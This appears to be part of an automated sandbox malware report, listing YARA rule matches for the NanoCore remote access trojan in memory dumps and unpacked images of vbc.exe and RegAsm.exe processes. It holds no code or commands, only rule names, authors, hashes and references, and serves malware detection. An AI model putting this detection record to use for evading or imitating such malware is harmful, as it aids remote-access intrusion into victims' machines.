Source: 00000005.00000002.2364015213.0000000000E80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2364015213.0000000000E80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.2363776217.0000000000A50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2363776217.0000000000A50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2363541585.00000000005A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2363541585.00000000005A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2363994318.0000000000E10000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2363994318.0000000000E10000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2363897217.0000000000C10000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2363897217.0000000000C10000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2363890046.0000000000C00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2363890046.0000000000C00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2363636659.00000000006C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2363636659.00000000006C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2363548286.00000000005B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2363548286.00000000005B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2363938383.0000000000CB0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2363938383.0000000000CB0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.2363557929.00000000005C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2363557929.00000000005C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.2364567768.0000000002A21000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.2365764646.0000000003B49000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: vbc.exe PID: 1616, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: vbc.exe PID: 1616, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegAsm.exe PID: 2164, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegAsm.exe PID: 2164, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.RegAsm.exe.c10000.11.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.c10000.11.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.cb0000.12.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.cb0000.12.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.3627c48.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.vbc.exe.3627c48.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.3627c48.8.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.RegAsm.exe.e80000.19.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.e80000.19.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.6c0000.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.6c0000.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.3b67402.28.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.3b67402.28.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.2a5109c.23.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.2a5109c.23.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.c00000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.c00000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.e1e8a4.18.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.e1e8a4.18.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.a40000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.a40000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.5b0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.5b0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.3486e00.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.vbc.exe.3486e00.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.3486e00.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.RegAsm.exe.5c0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.5c0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.340edc0.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.vbc.exe.340edc0.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.vbc.exe.340edc0.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.RegAsm.exe.5b0000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.5b0000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.5a0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.5a0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.RegAsm.exe.e80000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.RegAsm.exe.e80000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
